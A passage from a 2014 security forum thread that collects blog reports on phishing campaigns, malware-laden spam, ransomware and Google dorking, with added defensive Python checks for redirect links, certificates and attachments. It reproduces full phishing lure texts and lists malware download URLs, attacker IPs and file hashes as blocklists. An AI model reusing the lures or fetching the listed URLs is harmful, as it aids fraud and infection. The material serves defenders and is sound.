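    target = extract_redirect_target(link)
    final_host = urlsplit(target).hostname if target else visible_host
    return {
        "visible_host": visible_host,
        "final_host": final_host,
        "redirected": target is not None,
        "target": target,
    }


if __name__ == "__main__":
    # For the sample link this reports visible_host www.google.com but
    # final_host dl6.c1l.us, which is the mismatch worth alerting on.
    print(describe_link(SAMPLE_LINK))
```

A filter built on this would treat any link whose final_host differs from the visible_host as a hover-check failure, regardless of how trustworthy the visible domain looks.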


#1272 AplusWebMaster

Posted 05 September 2014 - 06:38 AM

FYI...

Phishing safety ...
- http://blog.trendmic...s-https-enough/
Sep 5, 2014 - "It was recently reported that Google would improve the search ranking of HTTPS sites in their search engine. This may encourage website owners to switch from HTTP to HTTPS. Cybercriminals are -also- taking part in this switch... we recently spotted a case where users searching for the -secure- version of a gaming site were instead led to a phishing site. We researched phishing sites that used HTTPS and were blocked by Trend Micro web reputation technology from 2010-2014. Based on our investigation, the number of phishing sites is increasing and we expect it to -double- towards the latter part of 2014...
Number of HTTPS phishing sites from 2010 to 2014:
> http://blog.trendmic...HTTPS_count.jpg
One of the reasons for this spike is that it is easy for cybercriminals to create websites that use HTTPS: they can either compromise sites that already use HTTPS, or use legitimate hosting sites or other services that already use HTTPS. There is no need for the cybercriminals to acquire their own SSL certificate, since they have just abused or compromised servers that -do- have valid certificates...
Screenshots of legitimate site (left) and phishing site (right):
> http://blog.trendmic...hishingsite.jpg
... While some sites have a green icon bar in the address bar as a security indicator, users still need to check the common name and organization. For example, users search for the Bank of America login page and click on the top result. In the login page, they can check for the green icon bar and the domain name, (which in this case is bankofamerica.com). When they click the green icon bar, a window will pop up. Users can then check for the “Issued to” which is equivalent to “Common Name.”  Note that the Common Name should be similar to the domain name...
Check the green icon bar and the domain name to determine if it is a legitimate site:
> http://blog.trendmic...reenbaricon.jpg
As more and more sites use SSL due to the boost in Google search rankings, users will have to become aware that the padlock of HTTPS is no longer a sign that they are visiting a safe site. They must first check the certificate before proceeding to enter credentials and personally identifiable information (PII)... Based on feedback from the Smart Protection Network data, the top affected countries that visit HTTPS phishing sites are US and Brazil.
Top affected countries:
> http://blog.trendmic...ountries-01.jpg ..."
___

Hoax email comes with malicious Word doc
- http://blog.dynamoo....comes-with.html
5 Sep 2014 - "... Spanish-language spam email reports the (fake) death of Shakira in a car accident. Attached is a Word document that contains a malicious macro...  translates as:
Shakira dies in serious accident
    This morning at 1:10 A.M. in the neighborhood La Macarena, Colombia. The well-known singer and performer Shakira Isabel Mebarak Ripoll, suffered a serious car accident in which she lost her life. Aboard the vehicle was her manager, who was seriously injured. Witnesses say the car driven by the latter, was speeding ..
    To view exclusive images and details of the story, we have attached a document with all the information about this tragic event.


When attempting to open the Word document (IMAGENES_01.doc), the potential victim sees the following:
Screenshot: https://4.bp.blogspo...600/shakira.png

The rest of the document explains to the victim how to remove the security settings from Word, supposedly to enable them to view the pictures. But what will actually happen is that the malicious macro in the document will try to infect the PC. This malicious document has a VirusTotal detection rate of just 2/54*. According to an analysis of the document, it then appears to download additional components from an insecure Joomla site at [donotclick]www .papeleriaelcid .com/aurora/ajax/ ... In this case the originating IP was 207.150.195.247 (a SouthWeb Ventures IP allocated to a customer supposedly called "Microinformatica Gerencial, S.A. de C.V."). Blocking the papeleriaelcid .com site and rejecting emails from 207.150.195.247 might be wise ..."
(English or other languages may be spammed out next.)
* https://www.virustot...sis/1409926479/
___

NatWest Phish: “You are Logging In from Different Cities”
- https://blog.malware...fferent-cities/
Sep 5, 2014 - "There’s a NatWest phish in circulation which tries to scare recipients with warnings of logins from multiple cities which it claims is forbidden. Anybody spending a lot of time on the road for work or personal reasons could potentially be panicked into clicking the links in this one. The URL in the mail leads to a 404 error on a website about different types of paint, so it’s likely been reported and / or pulled by the hosts but here’s the text so you can easily spot it the next time it gets rolled out with a fresh URL:

    Dear Customer,
    During a recent review of your account we found that you are currently logging in from different cities in a suspicious manner that is not compliant with our bank policies.
    NatWest customers are not permitted to log in from different places at same time, or using proxies.
    For your safety, we have temporarily deactivated your account, to reactive your account please go to our SSL secure link below and update your account credentials.
    However, please note that our squad reserves the right to close your account at any time. As such, we encourage you to become familiar with our program policies and monitor your network accordingly.


The email displays the full URL in the text of the legitimate NatWest website, but uses the old trick of making the clickable link take them to a -phish- hosted on a -compromised- website... it’s always a good idea to hover over any clickable link in an email so you can check the final destination... with so many people traveling as part of their job nowadays this could easily snag a few victims."
___

Cryptographic Locker
- http://www.webroot.c...graphic-locker/
Sep 5, 2014 - "... every few weeks we see a -new- encrypting ransomware variant. It’s not surprising either since the business model of ransoming files for money is tried and true. Whether it’s important work documents, treasured wedding pictures, or complete discographies of your favorite artists, everyone has valuable data they don’t want taken. This is the last thing anyone wants to see:
> https://www.webroot....und-cropped.png
This variant does bring some new features to the scene, but also fails at other lessons learnt by previous variants. Starting with the new features this variant will now just “delete” the files after encrypting them (it just hides them from you). This doesn’t add any more intangibility since they are encrypted with AES-128 anyway, but it does add a greater sense of loss and panic since all of your common data directories will appear to have been cleaned out. Another new feature is the constant raise in price every 24 hours. While price bumping was used on previous variants, this one doesn’t have a limit...  this variant falls short on overall volatility is in the failure to delete the VSS (Volume Shadow Service) so using tools like Shadow Explorer* will work to retrieve your files and circumvent paying the ransom. As I’ve said in previous blogs I do expect issues like this to be fixed once this malware is adopted by more botnets for widespread distribution..."
* http://www.shadowexplorer.com/
 

:ph34r:  :grrr:


Edited by AplusWebMaster, 05 September 2014 - 02:16 PM.

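The Trend Micro item above says the padlock alone proves nothing and that the certificate's "Issued to" (Common Name) or Subject Alternative Name must match the domain the user meant to visit. As an added example, not code from the post or from Trend Micro, here is that check written out: the certificate dictionaries are constructed to look like what Python's ssl.getpeercert() returns, the hosting.example certificate is a made-up one standing in for a compromised HTTPS host, and no network connection is made. The wildcard rule implemented (one wildcard, left-most label only) is the usual browser rule, which the post does not spell out.

```python
"""Hostname-versus-certificate checks for the HTTPS phishing case above.

Added example (not from the original post). Certificates below are
constructed, in the shape ssl.SSLSocket.getpeercert() returns, so the
script runs offline.
"""
from typing import List


def _name_matches(pattern: str, hostname: str) -> bool:
    """Match one certificate DNS name against a hostname.

    Browser rule: a wildcard may only stand for the whole left-most label,
    so *.example.com matches www.example.com but not example.com or
    a.b.example.com. Comparison is case-insensitive.
    """
    pattern = pattern.lower().rstrip(".")
    hostname = hostname.lower().rstrip(".")
    if "*" not in pattern:
        return pattern == hostname
    p_labels = pattern.split(".")
    h_labels = hostname.split(".")
    if p_labels[0] != "*" or len(p_labels) < 3 or len(p_labels) != len(h_labels):
        return False
    return p_labels[1:] == h_labels[1:]


def cert_names(cert: dict) -> List[str]:
    """Names a certificate is issued to: SAN DNS entries, with the subject
    Common Name used only when the certificate carries no SAN."""
    sans = [value for kind, value in cert.get("subjectAltName", ()) if kind == "DNS"]
    if sans:
        return sans
    return [value for rdn in cert.get("subject", ()) for key, value in rdn if key == "commonName"]


def cert_matches_host(cert: dict, hostname: str) -> bool:
    """True when the certificate covers this hostname (what the padlock shows)."""
    return any(_name_matches(name, hostname) for name in cert_names(cert))


def is_expected_site(cert: dict, hostname: str, expected_domain: str) -> bool:
    """The check the post asks users to do by hand: the certificate must
    cover the hostname AND the hostname must be the domain the user meant
    to visit (or a subdomain of it). A valid certificate on a compromised
    host passes the first test and fails the second."""
    host = hostname.lower().rstrip(".")
    dom = expected_domain.lower().rstrip(".")
    on_expected_domain = host == dom or host.endswith("." + dom)
    return on_expected_domain and cert_matches_host(cert, hostname)


# Constructed certificate data (not real certificates)
BANK_CERT = {
    "subject": ((("commonName", "www.bankofamerica.com"),),),
    "subjectAltName": (("DNS", "www.bankofamerica.com"), ("DNS", "bankofamerica.com")),
}
HOSTING_CERT = {  # a shared host whose valid wildcard cert a phish could sit behind
    "subject": ((("organizationName", "Example Hosting Ltd"),), (("commonName", "*.hosting.example"),)),
    "subjectAltName": (("DNS", "*.hosting.example"), ("DNS", "hosting.example")),
}

if __name__ == "__main__":
    phish_host = "bankofamerica-login.hosting.example"
    print("padlock valid on phish host:", cert_matches_host(HOSTING_CERT, phish_host))
    print("is it really the bank:", is_expected_site(HOSTING_CERT, phish_host, "bankofamerica.com"))
```

The two printed lines make the post's point: the phishing host shows a perfectly valid padlock, and only comparing the certificate name with the domain the user intended to reach exposes it.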


#1273 AplusWebMaster

Posted 08 September 2014 - 05:13 AM

FYI...

Fake BH Live Tickets SPAM - (bhlive .co.uk / bhlivetickets .co.uk)
- http://blog.dynamoo....r-pan-spam.html
8 Sep 2014 - "...  very large quantity of these spam emails, purporting to be from:
    From:     bhlivetickets@ bhlive .co.uk
    Date:     8 September 2014 08:43
    Subject:     Confirmation of Order Number 484914
    ORDER CONFIRMATION
    Order Number     Order Date
    484914     07-09-2014 13:00
    YOUR E-TICKET(S) ARE ATTACHED TO THIS EMAIL, SENT TO [redacted]. Please print ALL PAGES of the PDF file attached to the email and bring them with you to gain admission to the event...


These emails are -not- from BH Live Tickets and their systems have not been compromised in any way. Instead, these emails are a forgery with an attachment (tickets.3130599.zip or similar) which in turn contains a malicious executable (in this case tickets.332091.exe). The VirusTotal detection rate for this malware is just 3/55*. Comodo CAMAS reports** that this downloads an additional component from tiptrans .com .tr/333 which has a VirusTotal detection rate of 4/51***. According to ThreatExpert****, this second component POSTs some information to 80.94.160.129:8080 (OVH, France) and also appears to contact 92.222.46.165 (National Academy Of Sciences Of Belarus).
Recommended blocklist:
tiptrans .com .tr
92.222.46.165
80.94.160.129
"
* https://www.virustot...sis/1410162673/

** http://camas.comodo....c59aacda2c1bfe3

*** https://www.virustot...sis/1410163490/

**** http://www.threatexp...394a991645aec4b

- http://myonlinesecur...ke-pdf-malware/
8 Sep 2014
Screenshot: http://myonlinesecur...ve_ticketsd.png

> https://www.virustot...sis/1410164460/
___

Fake RBS "Important Docs" SPAM - again ...
- http://blog.dynamoo....-docs-spam.html
8 Sep 2014 - "The Royal Bank of Scotland has been spoofed several times recently, this latest fake spam contains a payload that looks like it might be Cryptowall.
Date:      Mon, 8 Sep 2014 15:00:22 +0100 [10:00:22 EDT]
From:      Vicente Mcneill [Vicente@rbs .co.uk]
Subject:      Important Docs
Please review attached documents regarding your account.
Tel:  01322 929655
Fax: 01322 499190
email: Vicente@ rbs .co.uk ...


Attached is an archive RBS_Account_Documents.zip containing a malicious executable RBS_Account_Documents.scr which has a detection rate at VirusTotal of 4/53*... analysis shows that it attempts to download components from the following locations:
95.141.37.158/0809uk1/NODE01/0/51-SP3/0/
95.141.37.158/0809uk1/NODE01/1/0/0/
95.141.37.158/0809uk1/NODE01/41/5/4/
bullethood.com/ProfilePics/0809uk1.zip
95.141.37.158 is SeFlow.it Internet Services, Italy. bullethood .com is on a shared server at GoDaddy. The malware also appears to be attempting to connect to 94.23.250.88 (OVH, France).
Recommended blocklist:
bullethood .com
95.141.37.158
94.23.250.88
"
* https://www.virustot...sis/1410183105/
___

Cryptowall ransomware ...
- http://arstechnica.c...-gameover-zeus/
Sept 7 2014 - "... Within a week of the takedown of Gameover Zeus and Cryptolocker, a surge of spam with links to a Cryptolocker copycat, known as Cryptowall, resulted in a jump in ransomware infections, states a report released last week by security-services firm Dell Secureworks*. Cryptowall first appeared in November 2013, and spread slowly, but the group behind the program were ready to take advantage of the vacuum left by the downfall of its predecessor. Being prepared paid off: In six months, the Cryptowall group infected nearly 625,000 systems, and even though only 0.27% of victims paid, the group still made $1.1 million, according to data from a command-and-control server discovered by Dell Secureworks..."
* http://www.securewor...all-ransomware/
___

‘Dyre’ malware goes after Salesforce users
- https://blog.malware...lesforce-users/
Sep 8, 2014 - "San Francisco-based company Salesforce, well-known for its cloud-based Customer Relationship Management (CRM) software, emailed a security advisory to its customers late Friday.
Copy of the email sent by Salesforce:
> https://blog.malware...force_email.png
The threat known as Dyre was originally spotted by security firm CSIS* and by PhishMe** which also had uncovered the new malware earlier in June. Back then, the threat was aimed at banks and other financial institutions, something very reminiscent of other banking Trojans such as Zeus and its variants. But researchers discovered that the malware is now capable of capturing login credentials from Salesforce users by -redirecting- them through a phishing website. Dyre will initially infect users through some form of social-engineering, typically with an email that contains a malicious attachment. Once on the system, the malware can act as a man-in-the-middle and intercept every single keystroke. To be clear, this is not a vulnerability with Salesforce or its website, but rather a type of malware that leverages compromised end-point machines... This type of attack could mean there might be a new trend on the horizon, one that goes after Software as a Service (SaaS) users. Businesses increasingly rely on third-party software providers for their needs because it can be a cheaper option without all the headaches of doing it yourself. For example, instead of managing their own email server, companies will use Office365 or similar cloud-based email solutions. Banking credentials are still the bread-and-butter for the majority of cyber-crooks because they can be immediately used. But the data harvested from many SaaS applications also holds a tremendous value for those willing to invest the time to dig in and find bits of information that could lead to a large compromise in a top-tier business. There is no silver bullet to defend against these threats but once again a healthy balance of end-user education about phishing scams and proper end-point security solutions will go a long way. Data exfiltration is one of the most important issues of 2014 with a growing number of businesses being affected.
The effects on companies’ brands and trust of their customers can be very damaging and long lasting, not to mention the potential lawsuits that often follow."
* https://www.csis.dk/en/csis/news/4262/

** http://phishme.com/p...s-bypasses-ssl/
___

Fake "PAYMENT SLIP" SPAM - with an encrypted .7z archive
- http://blog.dynamoo....-encrypted.html
8 Sep 2014 - "This spam comes with a malicious attachment:
    From:     daniel mo [danielweiche002@ gmail .com]
    Subject:     PAYMENT SLIP
    Signed by:     gmail .com
    Thanks for your last message,
    We remitted 30% prepayment today amounting to 51,300USD against your invoice INV332831 as was agreed with you by our purchasing agent. Please check the attached invoice and the payment slip and correspond your account information. You will receive payment in your account after a few days.
    Please confirm the receipt  below,
    kindly use this password {121212} to view attachment for our payment slip;
    Thanks,
    Daniel
    Accounts Assistant
    67752222
    64472801
    Zenia Singapore Pte Ltd


In order to deal with the attachment new order.7z, you'll need something capable of dealing with .7z files (e.g. 7-Zip). Inside the archive is a malicious executable new order.scr which has a VirusTotal detection rate of 5/54*. I have not been able to analyse the malware any further than this."
* https://www.virustot...sis/1410186462/
___

RBC Royal Bank Phish - and PDF malware
- http://myonlinesecur...rvice-phishing/
8 Sep 2014 - "'You have received a new secure message from RBC Royal Bank Customer Service' pretending to come from RBC Royal Bank Customer Service <securemessage@ rbc .com> is an attempt to -scam- you and get your bank log on details. It also is trying to infect you and is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email is particularly devious, evil and crafty as it sends you to a site that at first glance you think is a phishing site ( if you are unwise enough to click any of the links in the email ). However that site also has a hidden iframe that tries to download some malware to the computer if you have a vulnerable version of Java. Then if that isn’t enough when you fill in the log in details on the page the buttons on the page appear to link to the genuine RBC bank site so hovering over the links will fool you into thinking that you are on the genuine RBC site:
> http://myonlinesecur...2014/09/rbc.png
... then the sign in button leads you to this webpage where any of the links or the buttons download what appears to be a genuine PDF file that looks blank. That file is a malformed PDF with a script virus embedded that will infect you. This file 09.08.14report.pdf has a current VirusTotal detection rate of 5/55*. These emails contain a genuine PDF file that is malformed  and contains a script virus and can infect you with no action on your part by simply previewing the PDF in your browser or in the PDF reader..."
* https://www.virustot...sis/1410199439/

- http://threattrack.t.../rbc-royal-bank
Sep 8, 2014 - "Subjects Seen:
    You have received a new secure message from RBC Royal Bank Customer Service
Typical e-mail details:
    You have received a secure message
    This is an automated message sent by Royal Bank Secure Messaging Server.
    The link above will only be active until: 09/10/2014
    Please click here or follow this link : royalbank.com/cgi-bin/rbaccess/rbcgi3m01
    Help is available 24 hours a day by email at secure.emailhelp @rbcroyalbank.com
    If you have concerns about the validity of this message, please contact the sender directly. For questions about Royal Bank’s e-mail encryption service, please contact technical support at 1-800-769-2511.
    First time users - will need to register before reading the Secure Message.


Malicious URLs:
    halilbekrek .com/TUTOS/libs/excel/install6.exe
    66.235.98.169/rbc.com/webapp/ukv0/signin/logon.php
    66.235.98.169/rbc.com/webapp/ukv0/signin/report/09.08.14report.pdf
    84.45.53.45/rbc.com/webapp/ukv0/signin/logon.php
    84.45.53.45/rbc.com/webapp/ukv0/signin/message.html
    84.45.53.45/rbc.com/webapp/ukv0/signin/report/09.08.14report.pdf

Malicious File Name and MD5:
    install6.exe (e3fbc7b3bf11f09c5ee33b1e1b45f81b)
    09.08.14report.pdf (ecddafa699814679552d2bf95fc087e5)
    OfigGigg.dat (85d42ccc12301bbda27abf4c0b7eb7ff)


66.235.98.169: https://www.virustot...69/information/

84.45.53.45: https://www.virustot...45/information/

Tagged: RBC, Vawtrak, CVE-2013-2729
___

Fake Tcn Invoice SPAM – PDF malware
- http://myonlinesecur...ke-pdf-malware/
8 Sep 2014 - "'Tcn Invoice # N265588248042E' pretending to come from  Katharine Norwood <Katharine.Norwood@ advanced-ornamentation .com>  is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
    Good morning...
    I requested an invoice yesterday; on the invoice it shows a charge of $585.15 although on my credit card statement it shows a charge of $185.13. Can you please advise on what the total should be and if it is for the amount of $185.13 can you please provide an invoice with that amount.
    Thank you.
    Katharine Norwood
    Administrative Assistant
    San Diego, CA 92135
    205 840-2913


8 September 2014: Invoice.zip ( 48 kb) : Extracts to Invoice.pdf.scr
Current Virus total detections: 4/55*. This 'Tcn Invoice # N265588248042E' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1410198304/
___

Twitter Phish SPAM: “Strange Rumors About You”
- https://blog.malware...mors-about-you/
Sep 8, 2014 - "... an ongoing Twitter spam attack which is sending potential victims to phishing pages via a Tumblr -redirect- . Compromised Twitter accounts and / or bots are sending variations of the below to Twitter users:
> https://blog.malware...witterspam1.jpg
We’ve seen some 200+ messages sent in the last ten minutes, and this attack has been ongoing for at least six hours. Here’s the Tumblr -spam- blog which is redirecting to the fake Twitter login, and the -fake- login itself:
> https://blog.malware...witterspam2.jpg
...
> https://blog.malware...witterspam3.jpg
The -fake- page reads:
    “Your current session has ended.
    For security purposes your [sic] were forcibly signed out. You need to verify your Twitter account, please relogin.”

Twitter users should -avoid- signing into Twitter via any of the links being sent around, and always check the URL to ensure they’re entering their credentials in the right place."

211.154.136.106: https://www.virustot...06/information/
 

:ph34r:  :grrr:


Edited by AplusWebMaster, 08 September 2014 - 07:05 PM.

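Most of the runs in the post above share one trick: a .zip whose only member is an executable (tickets.332091.exe, RBS_Account_Documents.scr, Invoice.pdf.scr) with a document icon and, in the "PAYMENT SLIP" case, a password-protected .7z that no gateway can look inside. As an added example, not code from any of the quoted blogs, here is the attachment check a mail gateway would run: open the zip in memory, classify each member by its real extension, and treat anything it cannot open (7z, encrypted members) as uninspectable rather than clean. The archives are constructed inline with the file names quoted in the post; the extension lists are assumptions for the example and not the blogs' own.

```python
"""Flag mail attachments that hide an executable behind a document name.

Added example (not from the original post). The sample archives are
built in memory with the member names quoted in the post, so the script
runs offline. 7-Zip archives are detected by magic bytes only, since the
standard library cannot open them.
"""
import io
import zipfile
from typing import Dict, List, Tuple

# Extensions Windows will execute; assumed lists for this example
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse", "vbs", "wsf", "hta"}
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "rtf", "txt"}
SEVEN_ZIP_MAGIC = b"7z\xbc\xaf\x27\x1c"  # leading bytes of every .7z archive


def classify_name(name: str) -> str:
    """Return 'executable', 'double-extension' or 'ok' for one file name."""
    parts = name.lower().rsplit("/", 1)[-1].split(".")
    if len(parts) < 2:
        return "ok"
    ext = parts[-1]
    if ext not in EXECUTABLE_EXTS:
        return "ok"
    # e.g. Invoice.pdf.scr: a document suffix right before the executable one
    if len(parts) >= 3 and parts[-2] in DOCUMENT_EXTS:
        return "double-extension"
    return "executable"


def inspect_attachment(filename: str, data: bytes) -> List[Tuple[str, str]]:
    """Return (name, verdict) pairs for an attachment.

    Archives the gateway cannot open (7z, encrypted zip members) come back
    as 'uninspectable' so the caller quarantines them instead of waving
    them through for lack of evidence.
    """
    if data.startswith(SEVEN_ZIP_MAGIC):
        return [(filename, "uninspectable")]
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return [(filename, classify_name(filename))]
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.flag_bits & 0x1:  # general-purpose bit 0: member is encrypted
                findings.append((info.filename, "uninspectable"))
            else:
                findings.append((info.filename, classify_name(info.filename)))
    return findings


def should_quarantine(findings: List[Tuple[str, str]]) -> bool:
    """Any verdict other than 'ok' keeps the message out of the inbox."""
    return any(verdict != "ok" for _, verdict in findings)


def make_zip(members: Dict[str, bytes]) -> bytes:
    """Build a zip archive in memory (used only to construct the samples)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, payload in members.items():
            zf.writestr(name, payload)
    return buf.getvalue()


# Constructed samples using the names quoted in the post; payloads are dummies
SAMPLE_TICKETS_ZIP = make_zip({"tickets.332091.exe": b"MZ dummy"})
SAMPLE_INVOICE_ZIP = make_zip({"Invoice.pdf.scr": b"MZ dummy"})
SAMPLE_CLEAN_ZIP = make_zip({"09.08.14report.pdf": b"%PDF-1.4 dummy"})
SAMPLE_7Z = SEVEN_ZIP_MAGIC + b"\x00" * 26  # header bytes only, not a real archive

if __name__ == "__main__":
    for name, data in [("tickets.3130599.zip", SAMPLE_TICKETS_ZIP),
                       ("Invoice.zip", SAMPLE_INVOICE_ZIP),
                       ("report.zip", SAMPLE_CLEAN_ZIP),
                       ("new order.7z", SAMPLE_7Z)]:
        findings = inspect_attachment(name, data)
        print(name, "-> quarantine" if should_quarantine(findings) else "-> deliver", findings)
```

Note that the clean sample is judged only by its member's extension; a real gateway would still hand the PDF to a scanner, since the RBC item above shows a genuine-looking .pdf can carry an exploit on its own.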


#1274 AplusWebMaster

Posted 09 September 2014 - 07:40 AM

FYI...

Fake Bill.com Invoice SPAM – PDF malware
- http://myonlinesecur...ke-pdf-malware/
9 Sep 2014 - "'Bill.com Invoice has been paid' pretending to come from The Bill .com Team <notificationonly@ hq.bill .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
[ Bill .com image ]
Hi,
Thank you for payment to Bill.com. The credit/debit card you have on file with us was successfully charged $115.33 for the billing period 08/01/14-09/01/14.
The Statement for this account is now available for viewing. Please find it attached to this email.
Have questions? Sign in at our website, then contact support.
Thank you,
The Bill .com Team
Please do not respond to this email. This e-mail was sent from a notification-only e-mail address.


9 September 2014: bill-d59f78596bfa79e01898cf9d0e645b99328028d597e9005146787f09435a01016270d6ffc5d69ec27901.zip ( 486 kb):
Extracts to BILL_ID_895634523945258345873645763459879876432985763298563253245.pdf.exe     Current Virus total detections: 28/55*. This Bill .com Invoice has been paid is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1410252379/
___

“Google dorking“ ...
- http://blog.trendmic...ins-everywhere/
Sep 9, 2014 - "Last July, the US Department of Homeland Security warned of a new kind of criminal attack: “Google dorking“*. This refers to asking Google for things they have found via special search operators... Google finds things online using a program that accesses web sites: the Google web crawler, called the Googlebot. When the Googlebot examines the web and finds “secret” data, it adds it to Google’s database just like any other kind of information... suppose your company’s HR representative left a spreadsheet with -confidential- employee data -online- . Since it’s open for everyone to access, the crawler sees and indexes it. From then on, even though it might have been hard to find before, a simple – or not so simple – Google search will point any attacker to it. Google never stored the actual data (unless it was cached), it just made it easier to find. This kind of “attack” has been around for as long as search engines have been around. There are whole books devoted to the subject of “Google dorking”, which is more commonly known as “Google hacking”. Books have been published about it for years, and even the NSA has a 643-page manual that describes in detail how to use Google’s search operators to find information. The warning – as ridiculous as it might seem – has some merit... finding information that has been carelessly left out in the open is not strictly criminal: at the end of the day, it was out there for Googlebot to find. Google can’t be blamed for finding what has been left public; it’s the job of web admins to know what is and isn’t on their servers wide open for the world to see. It’s not just confidential documents that are open to the public, either. As we noted as far back as 2013, industrial control systems could be found via Google searches. Even more worryingly, embedded web servers (such as those used in web cameras) are found online all the time with the Shodan search engine.
This latter threat was first documented in 2011, which means that IT administrators have had three years to shut down these servers, but it’s still a problem to this day. In short: this problem has been around for a while, but given that it’s still around an official warning from the DHS is a useful reminder to web admins everywhere: perform “Google dorking” against your own servers frequently, looking for things that shouldn’t be there. If you don’t, somebody else will and their intentions might not be so pure..."
* https://publicintell...google-dorking/
___

Fake Sage Outdated Invoice SPAM – PDF malware
- http://myonlinesecur...ke-pdf-malware/
9 Sep 2014 - "'Outdated Invoice' pretending to come from Sage Account & Payroll <invoice@ sage .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
[Sage logo image ]
Sage Account & Payroll
You have an outdated invoice from Sage Accounting that is ready for payment. To find out more details on this invoice, please follow the link bellow or click here to view/download your account invoice:
... Account?432532=Invoice_090914.zip
If we hold any information about you which is incorrect or if there are any changes to your details please let us know by so that we can keep our records accurate and up to date. If you would like to update your records or see a copy of the information that we hold about you, you can contact us at Data Protection Officer, Sage (UK) Ltd, North Park, Newcastle-upon-Tyne, NE13 9AA or by email to digital@sage.com. If you request a copy of your information you will need to pay a statutory fee which is currently £10.
The contents of this email and any attachments are confidential...


9 September 2014: invoice_090914.zip ( 18kb) : Extracts to invoice_090914.scr
Current Virus total detections: 4/55* . This 'Outdated Invoice' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1410267601/

- http://blog.dynamoo....voice-spam.html
9 Sep 2014
"Recommended blocklist:
95.141.37.158 ..."
(More detail at the dynamoo URL above.)

95.141.37.158: https://www.virustot...58/information/
___

Fake NatWest Invoice SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
9 Sep 2014 - "'Important – New account invoice' pretending to come from NatWest Invoice <invoice@ natwest .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
[NatWest logo image]
Your latest NatWest invoice has been uploaded for your review. If you have any questions regarding this invoice, please contact your NatWest service team at the number provided on the invoice for assistance.
To view/download your invoice please click here or follow the link below...


9 September 2014: invoice_090914.zip ( 18kb) : Extracts to invoice_090914.scr
Current Virus total detections: 4/55* . This 'Important – New account invoice' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1410267601/
___

Fake Worker’s Compensation SPAM – word.doc malware
- http://myonlinesecur...rd-doc-malware/
9 Sep 2014 - "'HMC&TS Worker’s Compensation Appeal' pretending to come from HM Courts and Tribunals Service <submit.wjq@ courtsni .gov.uk> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... So far today I have seen several subjects for this email:
    HMC&TS Worker’s Compensation Appeal
    Worker’s Compensation Summons
    HM Courts & Tribunals Service Summons
    HM Courts & Tribunals Service
All the emails are very similar, but will have different courts or tribunals listed and different dates, case numbers and tribunal members. The faked sender will always be the same name as the recipient of the email with a few random letters after the name... Email reads:
Worker’s Compensation Appeal Tribunal
Decision # 502
Board Direction To Rehear Decision #695
Claim No.: 2504=5704
Date of Original Notice of Appeal: June 10, 2014
Date Received at The Tribunal: June 19, 2014
Date of Board Direction to Rehear: August 11, 2014
Received: August 20, 2014
Date of Documentary Review by Appeal Committee: August 23, 2014
Date of Decision: September 6, 2014
     To Whom It May Concern,
     Your Corporation (named Respondent)
Appears to be in default because of its failure to comply with the Administrative Law Judge’s Prehearing Order without decent cause, and such default by Respondent constitutes an admission of all facts alleged in the Complaint and a waiver of Respondent’s right to contest such factual allegations. Respondent violated the section 9(6), paragraph B13(1) of the Jobseekers Act 1995.
We recommend you to download a copy of original Complaint at Tribunal in attachment below...


9 September 2014: Copy68789.zip (66kb): Extracts to Copy of original Complaint at Tribunal.docx.exe
Current Virus total detections: 1/55*. This is another one of the spoofed icon files that unless you have “show known file extensions” enabled, will look like a proper Microsoft Word .doc instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1410269102/

- http://threattrack.t...ls-service-spam
Sep 9, 2014
Screenshot: https://gs1.wac.edge...LcAX1r6pupn.png

Malicious File Name and MD5:
    Copy4855.zip (854ADF297E8B1D79BA0E744F90AFDE50)
    Copy of original Complaint at Tribunal.docx.exe (6D9BDE90B81C064ACA5ED994BC8A981A)


Tagged: HM Courts & Tribunals, Kuluoz
___

Hacks throw 25 malware variants at Apple Mac OS X
- http://www.theinquir...-apple-mac-os-x
Sep 9 2014 - "... 25 varieties of malware, some of which are being used in targeted attacks, warns security firm F-Secure. F-Secure reported uncovering the malware variants in its Threat Report H1 2014*, claiming it discovered the first 20 attack tools earlier this year..."
* http://www.f-secure....s/00002741.html
Sep 8, 2014
 

:ph34r:  :grrr:


Edited by AplusWebMaster, 09 September 2014 - 01:34 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1275 AplusWebMaster

Posted 10 September 2014 - 06:15 AM

FYI...

Fake DHL invoice SPAM
- http://blog.dynamoo....ust-dhl-no.html
10 Sep 2014 - "Geir Myklebust is a real employee for DHL in Norway, but neither he nor DHL are responsible for this spam run in any way (their systems have NOT been breached either). Instead, it contains a malicious attachment and it should simply be deleted.
